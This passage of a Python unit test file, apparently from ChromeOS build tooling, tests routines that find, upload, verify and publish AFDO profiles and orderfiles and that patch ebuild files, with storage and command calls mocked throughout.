chrome_name = 'chromeos-chrome-78.0.3893.0_rc-r1.ebuild'
self.PatchObject(
toolchain_util,
'_FindEbuildPath',
return_value=os.path.join('/path/to', chrome_name))
ret = toolchain_util._FindCurrentChromeBranch()
self.assertEqual(ret, self.current_branch)
def testFindLatestAFDOArtifactPassWithBenchmarkAFDO(self):
"""Test _FindLatestAFDOArtifact returns latest benchmark AFDO."""
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidBenchmarkProfiles)
self.assertEqual(latest_afdo,
'chromeos-chrome-amd64-78.0.3896.0_rc-r1.afdo.bz2')
def testFindLatestAFDOArtifactPassWithCWPAFDO(self):
"""Test _FindLatestAFDOArtifact return latest cwp AFDO."""
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidCWPProfiles)
self.assertEqual(latest_afdo, 'R78-3866.0-1570000000.afdo.xz')
def testFindLatestAFDOArtifactPassWithKernelAFDO(self):
"""Test _FindLatestAFDOArtifact return latest kernel AFDO."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='76')
latest_afdo = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidCWPProfiles)
self.assertEqual(latest_afdo, 'R76-3866.0-1570000000.gcov.xz')
def testFindLatestAFDOArtifactPassWithOrderfile(self):
"""Test _FindLatestAFDOArtifact return latest orderfile."""
latest_orderfile = toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidOrderfiles)
self.assertEqual(
latest_orderfile,
'chromeos-chrome-orderfile-field-78-3877.0-1567418235-'
'benchmark-78.0.3893.0-r1.orderfile.xz')
def testFindLatestAFDOArtifactPassOnLastBranch(self):
"""Test returns latest file on last branch when current has none."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='79')
self.testFindLatestAFDOArtifactPassWithBenchmarkAFDO()
def testFindLatestAFDOArtifactFailToFindAnyFiles(self):
"""Test function fails when no files on current branch."""
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='80')
with self.assertRaises(RuntimeError) as context:
self.testFindLatestAFDOArtifactPassWithBenchmarkAFDO()
self.assertEqual('No files found on %s for branch 80' % self.gs_url,
str(context.exception))
def testFindLatestAFDOArtifactsFindMaxFromInvalidFiles(self):
"""Test function fails when searching max from list of invalid files."""
mock_gs_list = [
self.MockListResult(
url=os.path.join(self.gs_url, 'Invalid-name-but-end-in-78.afdo'),
creation_time=1.0)
]
self.PatchObject(gs.GSContext, 'List', return_value=mock_gs_list)
with self.assertRaises(RuntimeError) as context:
toolchain_util._FindLatestAFDOArtifact(
self.gs_url, toolchain_util._RankValidBenchmarkProfiles)
self.assertIn('No valid latest artifact was found', str(context.exception))
class UploadAFDOArtifactToGSBucketTest(gs_unittest.AbstractGSContextTest):
"""Test top-level function _UploadAFDOArtifactToGSBucket."""
# pylint: disable=protected-access
def setUp(self):
self.gs_url = 'gs://some/random/gs/url'
self.local_path = '/path/to/file'
self.rename = 'new_file_name'
self.url_without_renaming = os.path.join(self.gs_url, 'file')
self.url_with_renaming = os.path.join(self.gs_url, 'new_file_name')
self.mock_copy = self.PatchObject(gs.GSContext, 'Copy')
def testFileToUploadNotExistTriggerException(self):
"""Test the file to upload doesn't exist in the local path."""
with self.assertRaises(RuntimeError) as context:
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
self.assertIn('to upload does not exist', str(context.exception))
def testFileToUploadAlreadyInBucketSkipsException(self):
"""Test uploading a file that already exists in the bucket."""
self.PatchObject(os.path, 'exists', return_value=True)
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=True)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
mock_exist.assert_called_once_with(self.url_without_renaming)
self.mock_copy.assert_not_called()
def testFileUploadSuccessWithoutRenaming(self):
"""Test successfully upload a file without renaming."""
self.PatchObject(os.path, 'exists', return_value=True)
self.PatchObject(gs.GSContext, 'Exists', return_value=False)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path)
self.mock_copy.assert_called_once_with(
self.local_path, self.url_without_renaming, acl='public-read')
def testFileUploadSuccessWithRenaming(self):
"""Test successfully upload a file with renaming."""
self.PatchObject(os.path, 'exists', return_value=True)
self.PatchObject(gs.GSContext, 'Exists', return_value=False)
toolchain_util._UploadAFDOArtifactToGSBucket(self.gs_url, self.local_path,
self.rename)
self.mock_copy.assert_called_once_with(
self.local_path, self.url_with_renaming, acl='public-read')
class GenerateChromeOrderfileTest(cros_test_lib.MockTempDirTestCase):
"""Test GenerateChromeOrderfile class."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.out_dir = os.path.join(self.tempdir, 'outdir')
osutils.SafeMakedirs(self.out_dir)
self.chroot_dir = os.path.join(self.tempdir, 'chroot')
self.working_dir = os.path.join(self.chroot_dir, 'tmp')
osutils.SafeMakedirs(self.working_dir)
self.working_dir_inchroot = '/tmp'
self.chroot_args = []
self.orderfile_name = 'chromeos-chrome-orderfile-1.0'
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self.test_obj = toolchain_util.GenerateChromeOrderfile(
self.board, self.out_dir, '/path/to/chrome_root', self.chroot_dir,
self.chroot_args)
def testCheckArgumentsFail(self):
"""Test arguments checking fails without files existing."""
with self.assertRaises(
toolchain_util.GenerateChromeOrderfileError) as context:
self.test_obj._CheckArguments()
self.assertIn('Chrome binary does not exist at', str(context.exception))
def testGenerateChromeNM(self):
"""Test generating chrome NM is handled correctly."""
chrome_binary = self.test_obj.CHROME_BINARY_PATH.replace(
'${BOARD}', self.board)
cmd = ['llvm-nm', '-n', chrome_binary]
output = os.path.join(self.working_dir, self.orderfile_name + '.nm')
self.test_obj.tempdir = self.tempdir
self.PatchObject(cros_build_lib, 'run')
self.test_obj._GenerateChromeNM()
cros_build_lib.run.assert_called_with(
cmd, stdout=output, enter_chroot=True, chroot_args=self.chroot_args)
def testPostProcessOrderfile(self):
"""Test post-processing orderfile is handled correctly."""
chrome_nm = os.path.join(self.working_dir_inchroot,
self.orderfile_name + '.nm')
input_orderfile = self.test_obj.INPUT_ORDERFILE_PATH.replace(
'${BOARD}', self.board)
output = os.path.join(self.working_dir_inchroot,
self.orderfile_name + '.orderfile')
self.PatchObject(cros_build_lib, 'run')
self.test_obj._PostProcessOrderfile(chrome_nm)
cmd = [
self.test_obj.PROCESS_SCRIPT, '--chrome', chrome_nm, '--input',
input_orderfile, '--output', output
]
cros_build_lib.run.assert_called_with(
cmd, enter_chroot=True, chroot_args=self.chroot_args)
def testSuccessRun(self):
"""Test the main function is running successfully."""
# Patch the two functions that generate artifacts from inputs that are
# non-existent without actually building Chrome
chrome_nm = os.path.join(self.working_dir, self.orderfile_name + '.nm')
with open(chrome_nm, 'w') as f:
print('Write something in the nm file', file=f)
self.PatchObject(
toolchain_util.GenerateChromeOrderfile,
'_GenerateChromeNM',
return_value=chrome_nm)
chrome_orderfile = os.path.join(self.working_dir,
self.orderfile_name + '.orderfile')
with open(chrome_orderfile, 'w') as f:
print('Write something in the orderfile', file=f)
self.PatchObject(
toolchain_util.GenerateChromeOrderfile,
'_PostProcessOrderfile',
return_value=chrome_orderfile)
self.PatchObject(toolchain_util.GenerateChromeOrderfile, '_CheckArguments')
mock_upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.test_obj.Perform()
# Make sure the tarballs are inside the output directory
output_files = os.listdir(self.out_dir)
self.assertIn(
self.orderfile_name + '.nm' + toolchain_util.XZ_COMPRESSION_SUFFIX,
output_files)
self.assertIn(
self.orderfile_name + '.orderfile' +
toolchain_util.XZ_COMPRESSION_SUFFIX, output_files)
self.assertEqual(mock_upload.call_count, 2)
class UpdateEbuildWithAFDOArtifactsTest(cros_test_lib.MockTempDirTestCase):
"""Test UpdateEbuildWithAFDOArtifacts class."""
# pylint: disable=protected-access
def setUp(self):
self.board = 'board'
self.package = 'valid-package'
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.variable_name = 'VARIABLE_NAME'
self.variable_value = 'new-afdo-artifact-1.1'
self.test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {self.variable_name: self.variable_value})
def testPatchEbuildFailWithoutMarkers(self):
"""Test _PatchEbuild() fail if the ebuild has no valid markers."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
osutils.Touch(ebuild_file)
with self.assertRaises(
toolchain_util.UpdateEbuildWithAFDOArtifactsError) as context:
self.test_obj._PatchEbuild(ebuild_file)
self.assertEqual(
'Ebuild file does not have appropriate marker for AFDO/orderfile.',
str(context.exception))
def testPatchEbuildWithOneRule(self):
"""Test _PatchEbuild() works with only one rule to replace."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name, 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
self.test_obj._PatchEbuild(ebuild_file)
# Make sure temporary file is removed
self.assertNotIn(self.package + '.ebuild.new', os.listdir(self.tempdir))
# Make sure the artifact is updated
pattern = re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
self.variable_name)
found = False
with open(ebuild_file) as f:
for line in f:
matched = pattern.match(line)
if matched:
found = True
self.assertEqual(matched.group('name')[1:-1], self.variable_value)
self.assertTrue(found)
def testPatchEbuildWithMultipleRulesPass(self):
"""Test _PatchEbuild() works with multiple rules to replace."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
another_variable_name = 'VARIABLE_NAME2'
another_variable_value = 'another-new-afdo-artifact-2.0'
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name,
'%s="another-old-afdo-artifact-1.0"' % another_variable_name,
'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {
self.variable_name: self.variable_value,
another_variable_name: another_variable_value
})
test_obj._PatchEbuild(ebuild_file)
# Make sure all patterns are updated.
patterns = [
re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
self.variable_name),
re.compile(toolchain_util.AFDO_ARTIFACT_EBUILD_REGEX %
another_variable_name)
]
values = [self.variable_value, another_variable_value]
found = 0
with open(ebuild_file) as f:
for line in f:
for p in patterns:
matched = p.match(line)
if matched:
found += 1
self.assertEqual(
matched.group('name')[1:-1], values[patterns.index(p)])
break
self.assertEqual(found, len(patterns))
def testPatchEbuildWithMultipleRulesFail(self):
"""Test _PatchEbuild() fails when one marker not found in rules."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
ebuild_file_content = '\n'.join([
'Some message before',
'%s="old-afdo-artifact-1.0"' % self.variable_name, 'Some message after'
])
osutils.WriteFile(ebuild_file, ebuild_file_content)
test_obj = toolchain_util.UpdateEbuildWithAFDOArtifacts(
self.board, self.package, {
self.variable_name: self.variable_value,
'another_variable_name': 'another_variable_value'
})
with self.assertRaises(
toolchain_util.UpdateEbuildWithAFDOArtifactsError) as context:
test_obj._PatchEbuild(ebuild_file)
self.assertEqual(
'Ebuild file does not have appropriate marker for AFDO/orderfile.',
str(context.exception))
def testUpdateManifest(self):
"""Test _UpdateManifest() works properly."""
ebuild_file = os.path.join(self.tempdir, self.package + '.ebuild')
cmd = ['ebuild-%s' % self.board, ebuild_file, 'manifest', '--force']
self.PatchObject(cros_build_lib, 'run')
self.test_obj._UpdateManifest(ebuild_file)
cros_build_lib.run.assert_called_with(cmd, enter_chroot=True)
class CheckAFDOArtifactExistsTest(cros_test_lib.RunCommandTempDirTestCase):
"""Test CheckAFDOArtifactExists command."""
def setUp(self):
self.orderfile_name = 'any_orderfile_name'
self.afdo_name = 'any_name.afdo'
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='78')
def _CheckExistCall(self, target, url_to_check, board='board'):
"""Helper function to check the Exists() call on a url."""
for exists in [False, True]:
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=exists)
ret = toolchain_util.CheckAFDOArtifactExists(
buildroot='buildroot',
chrome_root='chrome_root',
target=target,
board=board)
self.assertEqual(exists, ret)
mock_exist.assert_called_once_with(url_to_check)
def testOrderfileGenerateAsTarget(self):
"""Test check orderfile for generation work properly."""
self.PatchObject(
toolchain_util, '_GetOrderfileName', return_value=self.orderfile_name)
self._CheckExistCall(
'orderfile_generate',
os.path.join(
toolchain_util.ORDERFILE_GS_URL_UNVETTED, self.orderfile_name +
'.orderfile' + toolchain_util.XZ_COMPRESSION_SUFFIX))
def testOrderfileVerifyAsTarget(self):
"""Test check orderfile for verification work properly."""
self.PatchObject(
toolchain_util,
'_FindLatestAFDOArtifact',
return_value=self.orderfile_name)
self._CheckExistCall(
'orderfile_verify',
os.path.join(toolchain_util.ORDERFILE_GS_URL_VETTED,
self.orderfile_name))
def testBenchmarkAFDOAsTarget(self):
"""Test check benchmark AFDO generation work properly."""
self.PatchObject(
toolchain_util, '_GetBenchmarkAFDOName', return_value=self.afdo_name)
self._CheckExistCall(
'benchmark_afdo',
os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
self.afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX))
def testKernelAFDOAsTarget(self):
"""Test check kernel AFDO verification work properly."""
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.afdo_name)
self._CheckExistCall(
'kernel_afdo',
os.path.join(toolchain_util.KERNEL_AFDO_GS_URL_VETTED, '3.14',
self.afdo_name), 'lulu')
class AFDOUpdateEbuildTests(cros_test_lib.RunCommandTempDirTestCase):
"""Test wrapper functions to update ebuilds for different types."""
mock_benchmark_afdo = 'chromeos-chrome-amd64-78.0.3877.0.afdo.bz2'
mock_cwp_afdo = {
'silvermont': 'R78-3877.0-1566814872.afdo.xz',
'airmont': 'R78-3877.0-1566812873.afdo.xz',
'broadwell': 'R78-3865.35-1566812043.afdo.xz'
}
@staticmethod
def mockFindChromeAFDO(url, _pattern):
"""Mock toolchain_util._FindLatestAFDOArtifact for Chrome AFDO."""
if 'llvm' in url:
return AFDOUpdateEbuildTests.mock_benchmark_afdo
for arch in AFDOUpdateEbuildTests.mock_cwp_afdo:
if arch in url:
return AFDOUpdateEbuildTests.mock_cwp_afdo[arch]
# pylint: disable=protected-access
def setUp(self):
self.board = 'eve'
self.arch = 'broadwell'
self.kver = '4_4'
self.orderfile = 'chrome.orderfile.xz'
self.orderfile_stripped = 'chrome.orderfile'
self.kernel = 'R78-12345.0-1564997810.gcov.xz'
self.kernel_stripped = 'R78-12345.0-1564997810'
self.mock_obj = self.PatchObject(
toolchain_util, 'UpdateEbuildWithAFDOArtifacts', autospec=True)
self.chrome_branch = '78'
self.mock_branch = self.PatchObject(
toolchain_util,
'_FindCurrentChromeBranch',
return_value=self.chrome_branch)
self.mock_warn = self.PatchObject(
toolchain_util, '_WarnSheriffAboutKernelProfileExpiration')
self.PatchObject(
toolchain_util, '_FindCurrentChromeBranch', return_value='78')
self.PatchObject(osutils.TempDir, '__enter__', return_value=self.tempdir)
def testOrderfileUpdateChromePass(self):
"""Test OrderfileUpdateChromeEbuild() calls other functions correctly."""
mock_find = self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.orderfile)
toolchain_util.OrderfileUpdateChromeEbuild(self.board)
mock_find.assert_called_once_with(toolchain_util.ORDERFILE_GS_URL_UNVETTED,
toolchain_util._RankValidOrderfiles)
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-chrome',
update_rules={'UNVETTED_ORDERFILE': self.orderfile_stripped})
# pylint: disable=protected-access
def testAFDOUpdateChromeEbuildPass(self):
"""Test AFDOUpdateChromeEbuild() calls other functions correctly."""
mock_find = self.PatchObject(
toolchain_util,
'_FindLatestAFDOArtifact',
side_effect=self.mockFindChromeAFDO)
afdo_name = 'any_name_for_merged.afdo'
mock_create = self.PatchObject(
toolchain_util, '_CreateReleaseChromeAFDO', return_value=afdo_name)
self.PatchObject(os, 'rename')
ret = toolchain_util.AFDOUpdateChromeEbuild(self.board)
self.assertTrue(ret)
calls = [
mock.call(toolchain_util.BENCHMARK_AFDO_GS_URL,
toolchain_util._RankValidBenchmarkProfiles),
mock.call(
os.path.join(toolchain_util.CWP_AFDO_GS_URL, self.arch),
toolchain_util._RankValidCWPProfiles),
]
mock_find.assert_has_calls(calls)
mock_create.assert_called_with(
os.path.splitext(self.mock_cwp_afdo[self.arch])[0], self.arch,
os.path.splitext(self.mock_benchmark_afdo)[0], self.tempdir)
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-chrome',
update_rules={'UNVETTED_AFDO_FILE': os.path.join('/tmp', afdo_name)})
# pylint: disable=protected-access
def testAFDOUpdateKernelEbuildPass(self):
"""Test AFDOUpdateKernelEbuild() calls other functions correctly."""
mock_age = self.PatchObject(
toolchain_util, '_GetProfileAge', return_value=0)
mock_find = self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertTrue(ret)
url = os.path.join(toolchain_util.KERNEL_PROFILE_URL,
self.kver.replace('_', '.'))
mock_find.assert_called_once_with(url, toolchain_util._RankValidCWPProfiles)
mock_age.assert_called_once_with(self.kernel_stripped, 'kernel_afdo')
self.mock_warn.assert_not_called()
self.mock_obj.assert_called_with(
board=self.board,
package='chromeos-kernel-' + self.kver,
update_rules={'AFDO_PROFILE_VERSION': self.kernel_stripped})
def testAFDOUpdateKernelEbuildFailDueToExpire(self):
"""Test AFDOUpdateKernelEbuild() fails when the profile expires."""
self.PatchObject(
toolchain_util,
'_GetProfileAge',
return_value=toolchain_util.KERNEL_ALLOWED_STALE_DAYS + 1)
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertFalse(ret)
def testAFDOUpdateKernelEbuildWarnSheriff(self):
"""Test AFDOUpdateKernelEbuild() warns sheriff when profile near expire."""
self.PatchObject(
toolchain_util,
'_GetProfileAge',
return_value=toolchain_util.KERNEL_ALLOWED_STALE_DAYS - 1)
self.PatchObject(
toolchain_util, '_FindLatestAFDOArtifact', return_value=self.kernel)
ret = toolchain_util.AFDOUpdateKernelEbuild(self.board)
self.assertTrue(ret)
self.mock_warn.assert_called_once_with(self.kver, self.kernel_stripped)
class GenerateBenchmarkAFDOProfile(cros_test_lib.MockTempDirTestCase):
"""Test GenerateBenchmarkAFDOProfile class."""
# pylint: disable=protected-access
def setUp(self):
self.buildroot = self.tempdir
self.chroot_dir = os.path.join(self.tempdir, 'chroot')
osutils.SafeMakedirs(self.chroot_dir)
self.chroot_args = []
self.working_dir = os.path.join(self.chroot_dir, 'tmp')
osutils.SafeMakedirs(self.working_dir)
self.output_dir = os.path.join(self.tempdir, 'outdir')
unused = {
'pv': None,
'rev': None,
'category': None,
'cpv': None,
'cp': None,
'cpf': None
}
self.package = 'chromeos-chrome'
self.version = '77.0.3863.0_rc-r1'
self.chrome_cpv = portage_util.CPV(
version_no_rev=self.version.split('_')[0],
package=self.package,
version=self.version,
**unused)
self.board = 'board'
self.arch = 'amd64'
self.PatchObject(
portage_util, 'PortageqBestVisible', return_value=self.chrome_cpv)
self.PatchObject(portage_util, 'PortageqEnvvar')
self.test_obj = toolchain_util.GenerateBenchmarkAFDOProfile(
board=self.board,
output_dir=self.output_dir,
chroot_path=self.chroot_dir,
chroot_args=self.chroot_args)
self.test_obj.arch = self.arch
def testDecompressAFDOFile(self):
"""Test _DecompressAFDOFile method."""
perf_data = 'perf.data.bz2'
to_decompress = os.path.join(self.working_dir, perf_data)
mock_uncompress = self.PatchObject(cros_build_lib, 'UncompressFile')
ret = self.test_obj._DecompressAFDOFile(to_decompress)
dest = os.path.join(self.working_dir, 'perf.data')
mock_uncompress.assert_called_once_with(to_decompress, dest)
self.assertEqual(ret, dest)
def testGetPerfAFDOName(self):
"""Test _GetPerfAFDOName method."""
ret = self.test_obj._GetPerfAFDOName()
perf_data_name = toolchain_util.CHROME_PERF_AFDO_FILE % {
'package': self.package,
'arch': self.arch,
'versionnorev': self.version.split('_')[0]
}
self.assertEqual(ret, perf_data_name)
def testCheckAFDOPerfDataStatus(self):
"""Test _CheckAFDOPerfDataStatus method."""
afdo_name = 'chromeos.afdo'
url = os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX)
for exist in [True, False]:
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=exist)
self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=afdo_name)
ret_value = self.test_obj._CheckAFDOPerfDataStatus()
self.assertEqual(exist, ret_value)
mock_exist.assert_called_once_with(url)
def testWaitForAFDOPerfDataTimeOut(self):
"""Test _WaitForAFDOPerfData method with timeout."""
def mock_timeout(*_args, **_kwargs):
raise timeout_util.TimeoutError
self.PatchObject(timeout_util, 'WaitForReturnTrue', new=mock_timeout)
ret = self.test_obj._WaitForAFDOPerfData()
self.assertFalse(ret)
def testWaitForAFDOPerfDataSuccess(self):
"""Test method _WaitForAFDOPerfData() passes."""
mock_wait = self.PatchObject(timeout_util, 'WaitForReturnTrue')
afdo_name = 'perf.data'
mock_get = self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=afdo_name)
# TODO(crbug/1065172): Invalid assertion that had previously been mocked.
# mock_check =
self.PatchObject(toolchain_util.GenerateBenchmarkAFDOProfile,
'_CheckAFDOPerfDataStatus')
mock_decompress = self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile, '_DecompressAFDOFile')
mock_copy = self.PatchObject(gs.GSContext, 'Copy')
self.test_obj._WaitForAFDOPerfData()
mock_wait.assert_called_once_with(
self.test_obj._CheckAFDOPerfDataStatus,
timeout=constants.AFDO_GENERATE_TIMEOUT,
period=constants.SLEEP_TIMEOUT)
# TODO(crbug/1065172): Invalid assertion that had previously been mocked.
# mock_check.assert_called_once()
# In actual program, this function should be called twice. But since
# its called _CheckAFDOPerfDataStatus() is mocked, it's only called once
# in this test.
mock_get.assert_called_once()
dest = os.path.join(self.working_dir, 'perf.data.bz2')
mock_decompress.assert_called_once_with(dest)
mock_copy.assert_called_once()
def testCreateAFDOFromPerfData(self):
"""Test method _CreateAFDOFromPerfData()."""
# Intercept the real path to chrome binary
mock_chrome_debug = os.path.join(self.working_dir, 'chrome.debug')
toolchain_util._CHROME_DEBUG_BIN = mock_chrome_debug
osutils.Touch(mock_chrome_debug)
perf_name = 'chromeos-chrome-amd64-77.0.3849.0.perf.data'
self.PatchObject(
toolchain_util.GenerateBenchmarkAFDOProfile,
'_GetPerfAFDOName',
return_value=perf_name)
afdo_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
self.PatchObject(
toolchain_util, '_GetBenchmarkAFDOName', return_value=afdo_name)
mock_command = self.PatchObject(cros_build_lib, 'run')
self.test_obj._CreateAFDOFromPerfData()
afdo_cmd = [
toolchain_util._AFDO_GENERATE_LLVM_PROF,
'--binary=/tmp/chrome.unstripped', '--profile=/tmp/' + perf_name,
'--out=/tmp/' + afdo_name
]
mock_command.assert_called_once_with(
afdo_cmd,
enter_chroot=True,
capture_output=True,
print_cmd=True,
chroot_args=self.chroot_args)
def testUploadArtifacts(self):
"""Test member _UploadArtifacts()."""
chrome_binary = 'chrome.unstripped'
afdo_name = 'chrome-1.0.afdo'
mock_upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.test_obj._UploadArtifacts(chrome_binary, afdo_name)
chrome_version = toolchain_util.CHROME_ARCH_VERSION % {
'package': self.package,
'arch': self.arch,
'version': self.version
}
upload_name = chrome_version + '.debug' + \
toolchain_util.BZ2_COMPRESSION_SUFFIX
calls = [
mock.call(
toolchain_util.BENCHMARK_AFDO_GS_URL,
os.path.join(self.output_dir,
chrome_binary + toolchain_util.BZ2_COMPRESSION_SUFFIX),
rename=upload_name),
mock.call(
toolchain_util.BENCHMARK_AFDO_GS_URL,
os.path.join(self.output_dir,
afdo_name + toolchain_util.BZ2_COMPRESSION_SUFFIX))
]
mock_upload.assert_has_calls(calls)
def testGenerateAFDOData(self):
"""Test main function of _GenerateAFDOData()."""
chrome_binary = toolchain_util._CHROME_DEBUG_BIN % {
'root': self.chroot_dir,
'sysroot': os.path.join('build', self.board)
}
afdo_name = 'chrome.afdo'
mock_create = self.PatchObject(
self.test_obj, '_CreateAFDOFromPerfData', return_value=afdo_name)
mock_compress = self.PatchObject(toolchain_util, '_CompressAFDOFiles')
mock_upload = self.PatchObject(self.test_obj, '_UploadArtifacts')
ret = self.test_obj._GenerateAFDOData()
self.assertEqual(ret, afdo_name)
mock_create.assert_called_once_with()
calls = [
mock.call(
targets=[chrome_binary],
input_dir=None,
output_dir=self.output_dir,
suffix=toolchain_util.BZ2_COMPRESSION_SUFFIX),
mock.call(
targets=[afdo_name],
input_dir=self.working_dir,
output_dir=self.output_dir,
suffix=toolchain_util.BZ2_COMPRESSION_SUFFIX)
]
mock_compress.assert_has_calls(calls)
mock_upload.assert_called_once_with(chrome_binary, afdo_name)
class UploadVettedAFDOArtifactTest(cros_test_lib.MockTempDirTestCase):
"""Test _UploadVettedAFDOArtifacts()."""
# pylint: disable=protected-access
def setUp(self):
self.artifact = 'some-artifact-1.0'
self.kver = '3.18'
self.cwp_arch = 'broadwell'
self.mock_get = self.PatchObject(
toolchain_util,
'_GetArtifactVersionInEbuild',
return_value=self.artifact)
self.mock_exist = self.PatchObject(
gs.GSContext, 'Exists', return_value=False)
self.mock_upload = self.PatchObject(gs.GSContext, 'Copy')
def testWrongArtifactType(self):
"""Test wrong artifact_type raises exception."""
with self.assertRaises(ValueError) as context:
toolchain_util._UploadVettedAFDOArtifacts('wrong-type')
self.assertEqual('Only orderfile and kernel_afdo are supported.',
str(context.exception))
self.mock_exist.assert_not_called()
self.mock_upload.assert_not_called()
def testArtifactExistInGSBucket(self):
"""Test the artifact is already in the GS bucket."""
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=True)
ret = toolchain_util._UploadVettedAFDOArtifacts('orderfile')
mock_exist.assert_called_once()
self.assertIsNone(ret)
def testUploadVettedOrderfile(self):
"""Test _UploadVettedAFDOArtifacts() works with orderfile."""
full_name = self.artifact + toolchain_util.XZ_COMPRESSION_SUFFIX
source_url = os.path.join(toolchain_util.ORDERFILE_GS_URL_UNVETTED,
full_name)
dest_url = os.path.join(toolchain_util.ORDERFILE_GS_URL_VETTED, full_name)
ret = toolchain_util._UploadVettedAFDOArtifacts('orderfile')
self.mock_get.assert_called_once_with('chromeos-chrome',
'UNVETTED_ORDERFILE')
self.mock_exist.assert_called_once_with(dest_url)
self.mock_upload.assert_called_once_with(
source_url, dest_url, acl='public-read')
self.assertEqual(ret, self.artifact)
def testUploadVettedKernelAFDO(self):
"""Test _UploadVettedAFDOArtifacts() works with kernel afdo."""
full_name = self.artifact + toolchain_util.KERNEL_AFDO_COMPRESSION_SUFFIX
source_url = os.path.join(toolchain_util.KERNEL_PROFILE_URL, self.kver,
full_name)
dest_url = os.path.join(toolchain_util.KERNEL_AFDO_GS_URL_VETTED, self.kver,
full_name)
ret = toolchain_util._UploadVettedAFDOArtifacts('kernel_afdo', self.kver)
self.mock_get.assert_called_once_with(
'chromeos-kernel-' + self.kver.replace('.', '_'),
'AFDO_PROFILE_VERSION')
self.mock_exist.assert_called_once_with(dest_url)
self.mock_upload.assert_called_once_with(
source_url, dest_url, acl='public-read')
self.assertEqual(ret, self.artifact)
class PublishVettedAFDOArtifactTest(cros_test_lib.MockTempDirTestCase):
"""Test _PublishVettedAFDOArtifacts()."""
# pylint: disable=protected-access
def setUp(self):
self.package = 'silvermont'
self.package2 = 'benchmark'
self.afdo_sorted_by_freshness = [
'R78-3865.0-1560000000.afdo', 'R78-3869.38-1562580965.afdo',
'R78-3866.0-1570000000.afdo'
]
self.uploaded_invalid = {
self.package: self.afdo_sorted_by_freshness[0],
self.package2: None
}
self.uploaded = {
self.package: self.afdo_sorted_by_freshness[2],
self.package2: None
}
# Prepare a JSON file containing metadata
toolchain_util.TOOLCHAIN_UTILS_PATH = self.tempdir
osutils.SafeMakedirs(os.path.join(self.tempdir, 'afdo_metadata'))
self.json_file = os.path.join(self.tempdir,
'afdo_metadata/kernel_afdo.json')
self.afdo_versions = {
self.package: {
'name': self.afdo_sorted_by_freshness[1],
},
self.package2: {
'name': 'R1234',
},
'some-package-should-not-change': {
'name': 'R5678-1234',
},
}
with open(self.json_file, 'w') as f:
json.dump(self.afdo_versions, f)
GitStatus = collections.namedtuple('GitStatus', ['output'])
self.mock_git = self.PatchObject(
git, 'RunGit', return_value=GitStatus(output='non-empty'))
def testPublishOlderArtifactThanInMetadataFailure(self):
"""Test failure when publishing an older metadata as than JSON file."""
with self.assertRaises(
toolchain_util.PublishVettedAFDOArtifactsError) as context:
toolchain_util._PublishVettedAFDOArtifacts(self.json_file,
self.uploaded_invalid)
self.assertIn('to update is not newer than the JSON file',
str(context.exception))
def testPublishUploadedProfilesPass(self):
"""Test successfully publish metadata for uploaded profiles."""
toolchain_util._PublishVettedAFDOArtifacts(self.json_file, self.uploaded)
# Check changes in JSON file
new_afdo_versions = json.loads(osutils.ReadFile(self.json_file))
self.assertEqual(len(self.afdo_versions), len(new_afdo_versions))
self.assertEqual(new_afdo_versions[self.package]['name'],
self.uploaded[self.package])
for k in self.afdo_versions:
# Make sure other fields are not changed
if k != self.package:
